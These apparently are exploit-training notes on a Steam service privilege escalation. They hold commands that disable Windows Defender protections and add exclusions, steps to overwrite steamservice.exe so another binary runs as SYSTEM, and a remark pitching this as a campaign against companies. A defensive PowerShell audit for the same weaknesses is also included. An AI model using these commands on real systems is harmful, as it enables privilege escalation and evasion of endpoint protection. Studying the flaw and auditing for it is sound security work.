Exploit Development Training & Learning
This isn't really called this CVE, but Valve decided not to patch it. Related. Requires an AMSI bypass to work. Two variations: add a user, and drop a malicious file.
Several options to consider:
- "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
- Set-MpPreference -DisableIOAVProtection $true
- Add-MpPreference -ExclusionPath "C:" & Add-MpPreference -ExclusionProcess "C:\evil.exe"
- With an AMSI bypass added, this becomes an effective campaign against companies whose employees use Steam for LAN parties on their work laptops (they exist).
Cleanup:
- For complete cleanup, at the end: regln-x64.exe -d HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Valve\Steam\Apps\PrivEsc
- Download: https://github.com/tenox7/regln/releases
Another example of Steam/Valve Exploitation:
- Log on as non-admin on a box with steam
- Do not start steam or any game
- cat %system32%\calc.exe > %programfiles%\steam\bin\steamservice.exe
- Reboot
- Log on, start steam
- Now calc.exe runs (or attempts to run) as SYSTEM with the highest local privileges
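A defender-side audit for the two weaknesses these notes rely on (a Steam service binary that non-admins can overwrite, and Defender exclusions or IOAV protection being tampered with), added here as an example and not part of the original notes. The Program Files (x86) install path and the low-privilege group names it matches on are assumptions; adjust for your environment.

```powershell
# Added defensive audit, not from the original notes. Assumption: Steam lives under
# Program Files (x86); falls back to Program Files (the path used in the notes above).
$steamBin = Join-Path ${env:ProgramFiles(x86)} 'Steam\bin'
if (-not (Test-Path $steamBin)) { $steamBin = Join-Path $env:ProgramFiles 'Steam\bin' }
$service = Join-Path $steamBin 'steamservice.exe'

# 1. Can low-privilege principals write to the service binary or its directory?
#    Any ACE granting Write bits (Modify/FullControl include them) to Users,
#    Authenticated Users or Everyone makes the overwrite in the notes possible.
$writeMask = [System.Security.AccessControl.FileSystemRights]::Write
foreach ($target in @($steamBin, $service)) {
    if (-not (Test-Path $target)) { continue }
    $acl = Get-Acl -Path $target
    foreach ($ace in $acl.Access) {
        $id = $ace.IdentityReference.Value
        $lowPriv = $id -match '\\Users$|Authenticated Users$|^Everyone$'   # assumed group names
        if ($ace.AccessControlType -eq 'Allow' -and $lowPriv -and
            (($ace.FileSystemRights -band $writeMask) -ne 0)) {
            Write-Warning "$target : '$id' has write access ($($ace.FileSystemRights))"
        }
    }
}

# 2. Is steamservice.exe still a validly signed binary, or has it been replaced?
if (Test-Path $service) {
    $sig = Get-AuthenticodeSignature -FilePath $service
    if ($sig.Status -ne 'Valid') {
        Write-Warning "$service signature status: $($sig.Status)"
    } else {
        Write-Output "steamservice.exe signer: $($sig.SignerCertificate.Subject)"
    }
}

# 3. Defender tampering matching the commands listed above: IOAV disabled,
#    drive-wide path exclusions, or process exclusions.
$pref = Get-MpPreference
if ($pref.DisableIOAVProtection) { Write-Warning 'Defender IOAV protection is disabled' }
foreach ($p in @($pref.ExclusionPath)) {
    if ($p -match '^[A-Za-z]:\\?$') { Write-Warning "Drive-wide Defender exclusion: $p" }
}
foreach ($p in @($pref.ExclusionProcess)) { Write-Warning "Defender process exclusion: $p" }
```

Run it from an elevated PowerShell on the host; every warning is a finding that the corresponding step in the notes would succeed.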
From 2015: https://nvd.nist.gov/vuln/detail/CVE-2015-7985
Credits: Matt Nelson (@enigma0x3)